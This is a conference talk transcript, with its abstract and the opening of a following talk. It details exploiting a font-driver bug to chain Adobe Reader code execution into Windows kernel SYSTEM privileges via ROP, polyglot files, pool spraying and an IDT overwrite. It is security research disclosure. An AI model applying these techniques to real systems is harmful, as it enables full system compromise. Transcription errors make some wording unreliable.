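 * operands and pushes n back, at 4 bytes per operand. A negative n therefore
 * moves the pointer forward, up the stack. */
static long blend_decrement_bytes(int k, int n) {
    return 4L * (k - 1) * n;
}

int main(void) {
    /* k = 16 masters, n = -32768: the pointer jumps ~1.9 MB up the stack. */
    printf("%ld\n", -blend_decrement_bytes(16, -32768));    /* 1966080 */

    /* k = 2 masters: each unit of n is exactly one 4-byte slot, so pushing
     * -349 and blending parks OPSP 349 DWORDs past the array, right on the
     * saved EBP / return address in the example from the talk. */
    assert(-blend_decrement_bytes(2, -349) == 349 * 4);
    return 0;
}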
Both Adobe Reader and the Windows kernel were affected, so this means you can get RCE in Adobe Reader and then EoP in the Windows kernel using this single bug. Yeah, that's pretty interesting, I guess. But 64-bit is kind of a problem, as I said, because if you look at the code, it turns out that the N times master designs expression is cast to unsigned 32-bit before it is added to the 64-bit operand stack pointer. So if you specify a negative N value, the bounds check fails, the if triggers, and we are just aborted. But the fact is that there is no 64-bit version of Adobe Reader, to my current knowledge, so we can still own all of Adobe Reader; and for the 64-bit Windows kernel, we still have some other font bugs that we can exploit to get EoP. So, some actual exploitation. Okay. The overall goal is to prepare a PDF which pops calculator in the latest Adobe Reader affected by the vulnerability, on Windows 8.1, for both 32-bit and 64-bit versions of Windows; make it 100% reliable; achieve high integrity level, or rather an NT AUTHORITY\SYSTEM security token for the calculator, which means we want a full system compromise; and subvert all available exploit mitigations, because the vulnerability allows us to do this. And since there is no 64-bit Adobe Reader, we can create a single PDF that exploits the vulnerability, and then, inside the second-stage payload, we can differentiate between 32-bit and 64-bit kernels and attack them accordingly. So let's start with the user-land exploit. The primitive is really not that great, as I said before. Even though we can set the OPSP pointer well outside the local stack array, not all operators will work in that state. Specifically, all operators that actually increase OPSP check whether it's still within bounds, in order to follow the rule that the pointer should always point within the local array. This, for example, makes it impossible to write constants in the normal way, by just pushing values there, because we would be aborted immediately; and some other instructions, such as dup, pop, callsubr, random, and so on, are forbidden as well. Here is an example: you can see that the first thing the random implementation does is check whether OPSP is not larger than the end of the stack, and if it is, it just aborts. However, we're not really lost in this situation, because there are some commands which write to the stack but do not increase the stack pointer, because they also pop some values from the stack before that. And in the case of those instructions, they don't check the OPSP pointer at all; they don't really have a reason to, because if every instruction that does increase it checks the condition, then in theory it should also be fine for the instructions that don't increase it. The lack of this safety net is basically what makes this vulnerability exploitable. There aren't too many charstring instructions that make it possible to write to the stack this way, but there are a few of them: we have arithmetic instructions, addition, negation, division and so on, and we also have some other interesting ones, such as getting a value from the stack by index, getting a value from the transient array, and exchanging values on the stack. So maybe we can try to do something with this.
So, well, if we think about what we can do in this condition, we could maybe try to use the index instruction. That was my first thought because it replaces the top stack item with the one X items below the top where X is the original value from the stack. However, it couldn't really work because we don't really control the X under our operand stack pointer, right? And also, the arithmetic instructions don't really help us either because we don't control the original instructions and they do require controlled operands for us. But it's not really hopeless. There is this one other instruction that caught my attention which is get and it replaces the index with the value from the corresponding index from the transit array. So the first idea was that since the index is only 16 bits, maybe we could put the value that we want to put into the stack at a specific place into all of those transit array entries and, of course, make it sufficiently long so that it is full of those values and then we are sure that the index will work in the array and we will get the right value. But there are obviously some problems with this. First of all, over 65,000 of instructions just to put a single constant at a single specific place in the stack. It's not really very efficient. And the index is also a 16 bit value. So if the original value was a negative number that get would also bail out. But the absolute instruction maybe could fix this but I haven't checked. However, there is a much more smarter way to do it because we actually can control the value somehow which is basically directly under OPSP and this is the square root instruction. So what the square root instruction does is that it just puts a square root of the previous value on the stack in place of the old one. So the idea is that after five subsequent invocation of the instruction, whatever was originally on the stack, we end up with either zero if the original value was zero or one if the value was nonzero after five invocation of square root. This is kind of obvious. And then if we perform these operations and we use the get operation, that the operand for the get operation will either be zero or one. So let's see an example of how we could write some data to the stack. Let's say we want to put the value 31337. So we first put it on the operand stack, duplicate it, then put it into the transient array indexes zero and one using the put operations. Then we shift the operand stack pointer using the blend bug. So we put a minus 100 and then blend. Okay. Then we just execute five square root instructions so we can see that the original value is basically decreasing until the point where the highest 16 bits which are the argument for get become one and then we just issue the get instruction which fetches the data from the transient array. And we have the control value on the stack wherever we want. So the other thing that we would like to want to create a full ROP chain is read existing data from the stack because we cannot really create a ROP chain just based on inserting constants. So we have to perform some operations based on existing data from stack for example to create to calculate the addresses of ROP gadgets. So we can use a similar trick. We can just use the square root instruction to either also get a zero or one and then use the put instruction to put the value which is before the zero or the one into the transient array. 
And then if we pre-initialize the transient array, the first two entries to zeroes and then after we reach the value, we sum both entries, we will basically end up with the value that we want. And another thing that we would like to do is have the operand stack pointer reset back to the original address of the beginning of the operand stack so that we can perform further operations there. And it turns out that there is a set current point instruction which does exactly that with no side effects. So let's see another example. We basically just put a zero, duplicate it on the operand stack, then put the two zeroes inside of the transient array to allocate, sorry to initialize those two entries. Then we again shift the operand stack pointer, sum five square roots. Then we put the value that we want into the transient array. It will be index one because the original data was not zero. Then we reset the stack pointer. We get both transient array indexes zero and one into the operand stack with two get instructions. We then sum both of those numbers. And at this point, we have read our number, our value from the stack. So at this point, we can perform any operations we like. For example, we can subtract a specific value from that address in order to get the base address of some library that we want to use for rope chaining. And so this gives us all we need to actually create a reliable rope chain. And we can now think about what the rope chain could do to make it as elegant for us, make it as elegant as possible for us to continue the exploitation. So one thing would be to call a library with the path to the exploit PDF itself. Because the PDF magic doesn't really have to appear at the beginning of the file. It can be somewhere later on, I think in the first kilobyte or something. So we could just create a binary polyglot which would be both a PE and a PDF file. And the PE file would be a DLL that has the second stage code that we can execute. And Anzha Albertini has already done it as a proof of concept in 2012. However, there are two problems that we have to overcome. First of all, the problem is that there is no pointer to the path of our file on the threads stack. So we cannot just copy the address of the string and provide it as parameter to load library. And the other thing is that for whatever reason, I don't know really what it is, is that Adobe Reader recently began rejecting PDF files that start specifically with the MZ signature. So that won't work so easily. So we have to settle for a less elegant solution that is quite standard. So we would like basically to call virtual protect over stack in order to make it both readable, writable and executable. And then also put the first stage payload there. And that's it. And then have it executed. And the first frame of the Rop is just cool type internal implementation of the get proc address which takes a value of a function inside of kernel 3332 and then just jumps to it directly. So it's pretty simple. It's just several d-words of the Rop. And you can see here in the debugger that it works. We have like arbitrary code execution inside of Adobe Reader from the stack. That is very good. Okay. So even though that works, I wasn't really convinced to writing a second stage font related Win32k exploit in assembly in order to attack ATMFD. It's definitely possible, but it's a bit of a pain, I guess. So I still wanted to have a control DLL loaded via load library after all so that I can write the second stage payload in C++ preferably. 
And to our advantage, first of all, the renderer process at the time of the exploitation holds an active handle to the exploit PDF file with read access. And secondly, even though the rendered, the sandbox process is quite limited when it comes to writing capabilities to the file system, it can write to a temporary directory in update add of your CROBAT 11. So the idea would be to compile a second stage DLL with the exploit PDF file specified in the tab linked linker option in Visual Studio in order to create the polyglot. Then replace, of course, the two first magic bytes with something else, for example, small emz letters. That way we create the PDFP polyglot. And then in the assembly payload, what I decided to do would be to iterate over all possible handle values within some sensible range, and get the name of each of the objects of the handles and see if it ends with.pdf if it is. Then I just assume it's our PDF file because it's the only one currently handled by the renderer process. And I would write back the original emz signature after copying the file into the temp temporary directory and then invoke load library over that file within the temporary directory. And you can see that after I did it, it worked pretty well. I could actually write C++ second stage payload and it would show as a message box inside of Adobe Reader. So I could now write C++ code that could elevate privileges pretty conveniently. So as I said before, we can only, we can have a single second stage DLL because there is only one bit of Adobe Reader. And it can basically exploit both 32 and 64 bit kernels. We must only recognize the underlying system using a single API function and then we can drive exploitation accordingly. In both cases, we have to create a window and then the only difference is in the window procedure. So about rendering the font because in order to attack ATMFD to trigger the vulnerability, you actually have to render the font or at least try to get it rendered. So this requires several API calls to achieve. So that's creating the window and then loading the exploit font into the system, creating a handle to the font, selecting it and then finally drawing some text using that font. And turns out that all of them actually work fine inside of the sandbox because Win32K access is not locked in Adobe Reader except one function and yeah, the most important one, loading the font. So what I saw is that Win32K doesn't really want to load any fonts via the function, which by the way takes the file name of the font that we want to load under the Adobe Reader sandbox. So that's a bit of a problem. And if we look at the documentation, we can see that there is another function for loading fonts in Windows. It's called add font memory source x, which installs fonts directly from memory. So that would be convenient because I assume the problem was and it actually was in file system access. However, it didn't really provide any means of loading a font consisting of two files. So it could very well load a TTF file or an OTF file, but we needed to load a type one font and we couldn't really do it with this function and people on the Internet have also been wondering and they didn't find the solution. And I also confirmed that it was actually a problem by reverse engineering Win32K. And there are no other official or documented functions that we could use to actually load type one fonts. 
But obviously we are reverse engineers, so we can open up Aida and see what our system calls there might be that reference the font loading code. And it turns out that there is one font related system call as well that is not documented anywhere called anti GDI add remote font to DC. And if you type that into Google, it will result in zero results basically, either officially or unofficially. And if we strip the anti GDI prefix and just Google for the rest, then we will see that there is one result which is the description of Microsoft's patent. So if we look at the description of the patent, it basically just says that the function can be used to load fonts from memory. Similarly to other functions. Doesn't really give us too much information. We have to dig by ourselves. And fortunately, it's not similar to the other function that I mentioned. It's not just raw buffer with font data, but it's font files that are preceded by a header that specifies what the partitioning of the memory is and where in memory each of the files that we want to load is. So I had to reverse engineer the structure and it contains like a number of fields that are pretty easy to figure out how to initialize them. So we just have to initialize the is type one font to one that will make Win32k to assume that we want to load a type one file. And we can just say that the number of files is zero because Win32k will anyway know that we need to load two files and then we specify the offsets of the files. And then after that, we just put the data of the files. And after we do this, I confirm that Win32k will successfully load the files, the type one font from memory, and we will reach all of the relevant atmfd code paths so we can actually attack atmfd. So one thing we have to consider is that where do we put all of those kernel exploit fonts? Because since we want to create a single PDF of Doom, which is just a single file that attacks everything and pops cocks everywhere, we have to embed a lot of information there. So we can also either put the kernel exploits in PE resources because it's a DLL or we can just append it at the end of the file. So this is the structure of my proof of concept file. You can just see all of the information that I mentioned before. So you have a polyglot of PDF and PE which exploits Adobe Reader. And then after that, we have some padding and the exploits for 30 to bit and 64 bit exploits of the Windows kernel. So let's write a kernel exploit. 30 to bit. Let's start with 30 to bit because there is this is the same vulnerability that we can use with Adobe Reader. So if you know a little bit about Windows kernel and how it stores objects in memory, you know that elevation of privileges is fairly easy. You have to just find like a process that you know that is very privileged and you have to copy the security token of the process and copy that inside of the structure that describes other processes that you want to elevate and it can be really easily implemented in a short snippet of 86 assembly. So our ROPS goal in ATMFD would be to first allocate writeable executable memory, copy the EOP shellcode there, jump to the shellcode and have it do its job and then what is also important, we have to cleanly recover from this whole condition because we don't really want the operating system to crash at that point. So it should be fairly easy overall because the trashing exploitation process is exactly the same as with Adobe Reader. The blend instruction works in the same way. 
What is also convenient is that the addresses of ATMFD.dll, Win3rd2k.sys and NTOS kernel are all on the stack so we can make use of all of ROP gadgets from all of those three modules. And starting with Windows 8, most kernel memory allocations are allocated from a pool that is non-executable so we cannot reuse some other pool allocation that was allocated from such pools. We have to create an allocation by ourselves specifying the non-paged pool flag which still allocates normal executable non-pageable memory that we can use to store the payload. So this is how the ATMFD ROP payload looks like. It's also very, very simple. So we just allocate some memory and then we adjust the registers like ESI, EDI and ECX to point to the right memory regions. We perform a copy operations to copy like 128 bytes or maybe some more into the new allocation and then we just jump into it. And of course we have to have the EOP payload on the stack as well to be able to copy it to the new allocation. And after we do this, we can see that it works as well, pretty well. We have the kernel mode execution in ATMFD. So what we have to do now is just write the EOP shell code itself and it's just about, as I said, just traversing several kernel mode structures and replacing some pointers. The only interesting thing here that I didn't mention is that we have to also, if we want to spawn calculator, we also have to change the active process limit assigned to the job to more than one because otherwise we will not be able to create another process within the job. So yeah, so since we haven't spawned our calculator yet because we are not able to do it, I decided that my shell code is just going to elevate the privileges of the Adobe Reader 30-bit process and then after we have this, we can do anything from our second stage DLL. And then at the end, we are just jumping to other zero. So yeah, this is not really obvious why that would work because it shouldn't really recover cleanly, but it turns it does because ATMFD provides a rather performance very aggressive exception handling and it handles all invalid user mode memory references and just ignores them as if nothing happened. So it's actually not very nice for people that are fuzzing, for example, open type fonts because then if there was ever an exception that resulted in invalid user mode memory, the fuzzer would never know about it. But on the other hand, it's quite convenient for us here because we can just jump to other zero and ATMFD will just take care of the rest and return to user mode as if nothing happened. So we can see that it worked as well. We can see that the payload once executed actually elevated the privileges of the two processes of Adobe Reader. And the final step would be just to pop up a calculator using create process. But after several minutes of trying to make this happen, I realized that Adobe Reader hooks the current base create process a function. So we just have to restore it to make it work. And yeah, this is very simple. We just put the original five byte function prologue inside of the memory. So I have a live demo that I would like to show you. I have two virtual machines prepared. The resolution is pretty low, but I think it should work anyway. So we have the Poc.pdf file. Let's first see that the version of Adobe Reader is what we want. It's working really slowly. But yeah, it's 11, 0, 10. And we can also see that the operating system is Windows 8. Well, it's kind of obvious. So we can just open the file. 
Okay, so the calculator popped up. And then we can also see that it has elevated privileges. Maybe I will do a magnifier to make it better visible. So there is Calc. That is, yeah, it's not working very nice, but you can see that calculator has elevated privileges. So yeah, that's the 32-bit full system compromise using one vulnerability. Okay, so I think I still have a little bit of time so I can discuss the 64-bit exploitation of Windows kernel. So obviously, as I said before, we cannot make use of the previous bug because it doesn't exist or rather it's mitigated by how the code was written. So we have to use some other bug. And I had three options when thinking about it. There is a write-with-wear which works via an uninshiced pointer from the kernel pools. There was a control pool-based buffer overflow and a limited pool-based buffer underflow. So I thought that the first vulnerability would actually provide the best primitives for us to perform the exploitation itself. So let's learn about the vulnerability. It also makes it possible to do elevation of privileges as I will show. And it reproduces on both architectures and with type 1 and open type phones. So in order to understand the vulnerability, we also have to look back at a very old specification from 1998 where the registry object was defined. So a registry object is also related to multiple masters which by the way were being tried. We introduced to the open type format for a while but since it failed, they dropped the idea. And it was also subsequently removed from the specification in 2000 with all of the other multiple master related things but of course, ATMFD supports it. So we have to learn about two new instructions in charge strings called store and load. And these two instructions basically copy memory between the registry object and the transient array. So the registry object is just an array of say three pointers and these pointers hold the addresses of some allocations. So we can address the registry object using index 0, 1 or 2 as set in the specification. And yeah, this is the nice part. So it says that if we try to do an out of bounds index, the result is undefined which is also always a good sign in a specification because they might have got it wrong. And internally, the registry items are basically stored inside of a, they are stored as a three item array of registry item structures. We just store the size of the item and pointer to the item. And the verification of the registry index does of course exist because the bugs are not that trivial. But can you spot the bug here in the listing? Obviously, they are checking with the index that we specified is larger than three but they really should specify, should check for whether it is larger or equal than three because the only valid indexes are 0, 1 and 2. So this is a one of, of by one vulnerability in accessing the registry array. And as a result, using the load and store operators, we can actually trigger the following mem copy calls. We have controls transit array and size. So we can either, we can either copy into the pointer that is specified by the third entry in the registry array or we can read from it. Of course, provided that the size of registry item three is larger than zero and we have to remember that the variable is of type signed. So the registry array is part of the overall, like, very large font state structure. And what is very convenient for us is that it is uninitialized during the interpreter runtime. 
So it holds whatever values were there when the structure was allocated. So this means that if we can spray the kernel pools such that we can control the whole structure, both the size and the data, then we can have, like, unlimited read and write capabilities in the Windows kernel inside of the char string program. So this is how we can, how we can reproduce this vulnerability provided that we have sprayed the kernel pool. It's just a matter of five instructions. Four of them are just providing arguments to restore instruction. So it's the registry index and then offsets within the transit array and the registry items, item and then the number of d words that we want to copy. After that, we just call the store instruction and, yeah, the vulnerability occurs. So if we think about how we can, how we can spray the pool, knowing that the allocation that we want to spray is within session page pool, we can look up some existing research and it turns out that Tarjee Mant was actually doing stuff like that back in 2011 for Windows 7. And what he did is he just called a single function called set class long pointer, which is responsible for setting a Unicode menu name of arbitrary length. So this causes Win32k to basically create an allocation of an arbitrary size and content, which should be a Unicode string. And it still works today in Windows 8.1. So I was experimenting for a little while trying to see what, how many calls would suffice to have this memory region sprayed in the right way. And I came up with this like nested loop to allocate, create allocations between a thousand and four thousand bytes for a hundred times. And then on all of my test machines, it would, the memory that we had to spray would be sprayed reliably with the data that we had provided. In this case, it would be a 01010101 value for the size and then an invalid kernel pointer for the data pointer. And after we have this and we spray the memory pool and actually invoke all of those instructions shown in the title that we can see that the memory is actually being referenced and we have a write operation here. So that was quite easy, I guess. We have now the, we now have a write and read and write with work condition. The question is what shall you read and write? Because we're on Windows 8.1 trying to subvert all exploit mitigations and as it turns out, Microsoft actually went into great lengths to make it impossible to get any information about the kernel address space from within user mode and specifically from within low integrity processes. And of course, we would like to use whatever resources we have right now and not burn another zero day on this. So there are still things that Windows doesn't prevent us from acquiring about the kernel address space. We have two instructions that are quite useful called as SIDT and SGDT, which just give us into user mode the addresses of the IDT and GDT CPU structures inside of the kernel address space. So they are available in user mode by default and they are really impossible to disable or restrict as an operating system without using virtualization technology. So they provide us a very convenient NTA, ASLR primitive in the world of Windows 8.1 kernel exploitation. 
So another interesting thing is that on CPU zero in Windows, the structure of GDT and IDT and how they are placed in memory is quite peculiar because we have GDT and for directly after that we have IDT, the first structure is of 80 hex bytes, the other one is of 1,000 bytes, storing 256 structures of size 16 bytes and then because of the fact that those two structures don't align with the size of the page of the small 4K page, we have a lot of unused memory after that. And of course IDT is responsible for storing function pointers. It's full of function pointers and some of those function pointers are user facing such as the CPU exception handlers which are the low entries of IDT. But if we thought about overwriting it, it's not really the safest choice because other processes may reference it as well. And the kernel may do it too, so something unexpected could happen but there are also some interrupts that are designed specifically for user mode usage such as the three shown below. One other problem that we might have to consider is that the function pointers are actually partitioned inside of the structure, so it's not just a 64-bit function pointer but it's actually spread inside of the structure. We could deal with this using the arithmetic instructions of the Truster program because, yeah, why not? It makes it possible for us to do this but we also could keep things simple and just use kind of a trampoline of the form jump register and we could find such a gadget within the same memory page as the function that we are overwriting and in that way we could just overwrite the low 16 bits of the address instead of the full one and this would be fully reliable. So the other important thing is that ADIDT has read, write and execute access on CPU zero. So it both has function pointers and is RWE so we couldn't imagine a better situation for us. We could just use the unused bytes after the ADIDT to store our shellcode. Of course we have to care about things such as that SIDT only provides 32 bits of IDTR in the compatibility mode that we are executing in so we have to switch temporarily to 64 bits in order to get the address. We can do it using this simple Macros in Visual Studio. I'm not going to delve into this but it's pretty straightforward to get the IDTR registry. So what we should do in the second stage DLL is just make sure that we are running on CPU zero using a single API function that spray the session page spool as I shown before and just load the kernel exploit font and let it do its work. And inside of the font char string, inside of the loaded font, we first copy the entire IDTR into the transient array then we adjust entry 29 which is the QRIS security check failure function so that it points instead of the function it points to a jump R11 gadget which resides in the same memory page and then write that back to the IDT. So yeah, I just wanted to make it a little ironic that we are using the security interrupt to elevate our privileges. And then we just save the modified part of the IDT entry somewhere after IDT and we write the kernel mode EOP shell code later on. So this is how it looks like during the execution of the char string. We have the IDT and we have the transient array. So first we copy all of IDT inside of the transient array then we make a backup of the IDT entry that we're overwriting. 
Later on we're just subtracting a value from the IDT entry inside of the transient array or maybe add some value to point it to the jump R11 gadget and after we have this we just put it inside of the IDT itself then put the X64 shell code into the transient array and copy it into the IDT or rather after the IDT inside of the unused memory region. And once this is done the only thing left for us to do is that we have to trigger the function pointer that we have overwritten with R11 set to the address of the shell code that we have put in kernel memory. And what the shell code does is the same thing as it did for 32-bit versions of Windows so it just elevates the privileges of the Adobe reader process and increases the active process limit. After that we also unhook create process A and spawn calculator. So I will show you the demo of this in my other virtual machine. Here I will just show you that this is 64-bit version of Windows. Yeah, as you can see here it is. Maybe I will run Magnifier as well. So we just double click on the Pock.PDF and yeah, okay there is another calculator and also let's see that it's elevated. Maybe not. But you can see that all of the Adobe reader processes and calculator are indeed elevated to anti-authority system. So we have our mission accomplished. We ended up with a single PDF file that attacks both Windows 32-bit and 64-bit, the latest one, Windows 8.1 and Adobe reader 11. And yeah, so we bypassed all of the mitigations that we wanted. Stack hook is by the design of the vulnerability ASLR because we only used addresses that we either leaked or requested from the CPU depth because we run all of the stages in executable memory, sandboxing with the vulnerability in the Windows kernel which was the same for 32-bit and a little bit different one for 64-bit and SMAP also because we run the shell code from executable memory in the kernel address space. And we maintained complete reliability because there was no brute forcing or guessing involved. All stages were deterministic, maybe except for the full spraying one and 64-bit but I think it should be pretty reliable as well. So the final thoughts are that even though fonts received a lot of attention from the security community, apparently they are not dead and this was shown by this presentation and the previous one as well, I'd rather say that there seem to be more of them being found each year. So there are also some more bugs from me coming out and some blog posts detailing the details of the other ones that I mentioned today. And it's also quite doubtful that they ever will completely cease to exist. So it's a good thing that some companies are actually putting some mitigations or some design changes in place to make those bugs unexploitable or just not worth exploiting because they are not in privileged contexts. And yeah, we should also be aware of the fact that shared native code bases still exist and this is obviously very scary in the context of software security and especially in the context of file formats that were developed 20 or 30 years ago and the code really hasn't changed that much since then. So even in 2015, with all of those mitigations that we have, it turns out that it's still a matter of just a single good bug to get a full system compromise. And with that, I thank you very much and I'm happy to answer any questions. When you threw that bug the second time in the kernel, you jumped to zero and that was your safe return. Did you have a cool way to safe return in Reader? 
No, I didn't because there was no reason to do it in the proof of concept, right? Because yeah, it's not really important for me to make Adobe Reader responsive after the exploitation stage, but it could definitely be done because there are several functions up the stack frames that can be returned to. So it's not really a problem, but I didn't do it for the proof of concept. Okay, no more questions. Thank you.
|
"Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild. Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs. In this presentation, we will outline the current state of the art with regards to font security research, followed by an in-depth analysis of the root cause and reliable exploitation process of a number of recently discovered vulnerabilities, including several full exploit chains. In particular, we will demonstrate how a universal PDF file could be crafted to fully compromise the security of a Windows 8.1 x86/x64 operating system via just a single vulnerability found in both Adobe Reader and the Adobe Type Manager Font Driver used by the Windows kernel."
|
10.5446/32736 (DOI)
|
Thanks for watching! So we have a short announcement from Travis Goodspeed, who will also introduce the next talk. How to do. So as is the tradition at recon and a few other neighborly conferences, we have the International Journal of Proof of Concept to get the fuck out. This is release number 12. We zero index, so this is our 13th release, and I believe our third or our fourth at recon, which is always generous enough to print these for us and to ensure that the printing is good. They're by the registration desk. Just swing by and grab one, but don't ask for permission and don't slow down and dear God don't mob them because their job is hard enough. The next talk is by David Karn. A buddy of mine from way back. Oh God, it has been that long. Yeah. So he's going to be telling you how to reverse engineer a black box instruction set. And by this, it's not like an instruction set that you don't know. This is one that nobody knows, but for which you have an example binary and the ability to make changes and observe the results in that binary and nothing else. So without further ado, David Karn. Thank you. I'm on VGA right now. The HMI wasn't detecting. I think. Okay, one second. All right. Well, let's see if I can get it not mirrored. Otherwise, I won't have my speaker notes and that won't go so well. There we go. All right. All right. So as Travis most kindly introduced, my name is David Karn. The talk I'm doing is reverse engineering instruction encodings from raw binaries. And this talk came about because I was doing some hardware reverse engineering on a custom core and a number of my software reverter friends were asking about how does one approach a problem like this. And so I don't have any fancy awesome software release for you today, although I will be putting the disassembler and assembler that I'm talking about here up online, but it's not that cool. The target isn't that cool. And all the techniques that I'm going to be talking about are relatively well known, but a lot of people apparently haven't seen them before, so hence the talk. In fact, they're so well known that on Monday, I was telling some friends on IRC about the talk I was going to be doing and they said, hey, didn't someone do something just like this at recon 2012? And much to my dismay, it turns out they did. So I'm going to begin with a citation to Chernov and Trozina with recon 2012 reverse engineering of binary programs for custom virtual machines. And while I'm on the subject of citations, I'll also mention effects of Fino Elite, building custom disassemblers, which was presented at 27C3 for reversing engineering step seven stuff. But my focus as opposed to those two is going to be more on microcontrollers and low level systems, things that are directly coupled to the hardware and where they were built for a custom reasons because they needed a custom hardware functionality as opposed to trying to deter analysis or to have a custom bytecode. And life's a little bit different down at those low levels. You find interesting things that you don't find in standard VMs. And in particular, this target that we're going to be looking at today is not really amenable to a lot of automated analysis techniques or wide statistical techniques. The plain text or image size that we have is just so small. And the fact that it's a mix of code and data tends to really reduce the signal to noise ratio for any kind of bulk statistical or bulk guess and test automated method. 
So today's example, I'm going to talk about a couple of techniques, the first of which is cheating because there's no point in reverse engineering an entire custom core just to find out you've discovered the 8051. Second is using firmware structure to your advantage. And then I'll touch briefly on static techniques and then followed by some dynamic techniques. And I've only got a 30-minute slot, so I'm going to be moving really, really fast and covering this at a very high level. If you want to know more details, please pigeon mohomey after or at lunch or something like that. And Chernov and Trozina cover the static techniques very well, so I'm going to just sort of cover one example of recovering code flow from that. So today's example is the ADF7242, and that's an RF transceiver IC. It's made by analog devices, and the family includes sort of multiple variants for different frequency bands. And inside of it is a custom core that interacts directly with the RF hardware, and it's interesting for some reasons I'll talk about later. But first I should mention that reversing this has no particular importance in the security scheme of things at all. So I'm not claiming this is an important security finding by being able to reverse engineer or break this. The only point of interest for going after this thing is I originally started on it because Mike Ryan was interested in using this for a better ZigBee sniffer. And it's interesting because it can be interfaced with a computer with only a low-cost SPI cable, like any FTDI cable that you might have laying around. And since you can execute firmware on the chip, you can do real-time operations, like real-time selective jamming or real-time channel hopping to follow a channel hopping transmitter without having to deal with and compensate for the USB latency. And of course, finally, it's interesting because it exists. It's, you know, and a binary out there that's in the custom instruction set is sort of reverse or bait. So as part of this project, I created a disassembler or assembler for the ADF 7242 and the similar families, and I'll post it later for anyone that wants it, if there is anyone. So the first hint we have from the datasheet is that the radio control and packet management of the part are realized through the use of an 8-bit custom processor and embedded ROM. And this is about all the information we have about it, that there's a packet manager with a processor, that it addresses two memory spaces, which is a program RAM and ROM in one memory space, and a bunch of data for various uses in the other. So that brings us to technique one, which is cheating. And as a rule of thumb, until proven otherwise, a custom core isn't custom. Most of the time, it usually just ends up being an 8051, a 10-silica extends a core, or a synopsis Arc series core. And the extends in Arc cores are really commonly found because they allow a processor designer to sort of check a bunch of options and have a core created for you that you can synthesize in your product and get a tool chain that knows how to use it. They support adding custom instructions as well, but they're based around a common core that, you know, HexRays has a disassembler for some of it, I believe. There's definitely disassemblers out there for some of those, and those serve as a starting point for 99% of what you'll need. And of course, you have your friends, BinWalk-A, which can sometimes identify an architecture for you if you're lucky. 
Strings is great, datasheet press material, don't neglect this stuff before you dive right into the fun technical work. And it is, as an example of why strings is better than one might think, there was a DSP that I was looking at once upon a time that was effectively a black box, this chip you just gave it a blob that the manufacturer said you had to. And they mentioned Extenza, which tells you it's an Extenza core, that it uses the Vectra DSP instruction set as well as the RTOS it uses. So don't neglect the simple stuff. But back to the sample that we have. We have a datasheet for the part, a loadable firmware module, and an app note describing what that loadable firmware module does. So that loadable firmware module extends the functionality of the 7242, so it does things like implementing addressing filtering. So it can automatically say, hey, this packet coming in, is this one that's of interest to the processor? Does the CRC match? Is it of a frame type I want? Okay, then interrupt the processor, but not otherwise. So it's great for low power modes. And this loadable firmware module we have is only 1369 bytes. So it's a very small sample in terms of having something to look at to figure out how it's behaving. And what we want to know is, first of all, what kind of machine are we dealing with? Is it a stack machine? Is it a register machine? What are the data path sizes inside of it? If it's a register machine, how many registers does it have and how large are they? We'd like to know whether the instructions are registered to register or memory to memory. We'd also like to know whether the memory layout is one unified address space that covers everything or whether it's separate address spaces for those two blocks that I described before. And we actually already have some hints from the diagrams that we had, that I'd shown before. And one example is that it showed an 8-bit data path coming from the program ROM. And that right away tells you it's probably not a processor that's using a weird, for example, like the PIC series, a 14-bit instruction word. Because if you're building custom silicon and if we assume the data sheet is telling the truth, there's no reason to actually use an 8-bit path from the ROM when you can just use a 14-bit one just as easily. So before I go on to the next slide, does anyone here remember bank switching code? Is anyone unfortunate enough to be still writing code for something that does bank switching or requires it? I guess, there's a couple of us here, but I guess most everyone's lucky. Bank switching is when you swap a bank of memory in and out because the processor address space isn't large enough to encompass the entire code that you want to run on it. And that shows up really, really well when you have a firmware file. For example, in this image that I'm showing you right here, you can see regular structure at power of two boundaries. And that's a real clear indication that whatever target you're looking at is using banking of some kind. A good heuristic is to count the number of zeros or Fs or repeating bytes right before power of two boundaries. And the lowest power of two that has that is probably the one that you're seeing banking occur at. But actually, these days, compilers have gotten so good at allocating code in these situations that I had to sort of beat the compiler over the head to make an image that would show up here. And so I recommend the heuristic method rather than visually. 
But there's other structure in firmware files that we can use to our advantage. And that's that they have to have entry points. So this is a loadable module. It's not a piece of firmware that runs right on the microcontroller, so it might be a little bit different. But still, either the ROM that's going to be talking to this loadable module or if it's just firmware for the raw firmware for the processor, the processor still needs to get to the part of the code that you want it to execute. So it's a very common feature, and you actually heard some of this being talked about in the last talk, to have a vector table. And the vector table tells the processor, hey, here's where you're going to execute in the case of a certain instruction, or sorry, a certain interrupt, or in, you know, for example, at reset. And it's very common to have this at the start of the end. And sometimes this table takes the form of a number of instructions that will perhaps jump to the code, or it might be a tightly packed table of addresses. And I did a brief survey of a handful of randomly selected embedded architectures, some of which are common, some of which are less common. And as you can see, the vast majority allocate a continuous vector table at the start of the end, with the exception of one which actually only ever boots from a boot loader, so it's a bit different. Some of them can relocate it after the start, but it still needs to be at a fixed point at PowerOn, which is generally one of those two places. Usually it's tightly packed, so it's not spread out over the firmware. It's usually tightly packed at one end or the other. And as I mentioned before, some of them represented at its addresses, others represented at its instructions. And if we go back to our sample, and this is the first time I've showed you the actual sample we had, well, what do we see? Right at the start of the file. So pattern of sort of what I would call stride two, stride two pattern right at the start, you know, two-byte chunks that are self-similar on a two-byte boundary followed by a series of three-byte chunks that are similar on that pattern. And if we assume that all of this is a vector table, well, it would be a bit of an odd one because you don't normally see a vector table that has different sized elements in it. It would be harder for the processor designer to implement. So let's think about what we know about vector tables. Well, if it's addresses, it probably doesn't make sense. We'll just look at the first part. Because if we look at those as big, end-yining coded addresses, well, they only differ by a single byte for each value, so that can't be branching to meaningful code. And if it's a little end-yining coded address, then they're spaced by 0x100 to 256 bytes, and then it runs off the size of the module we just loaded, so that can't be a sensible 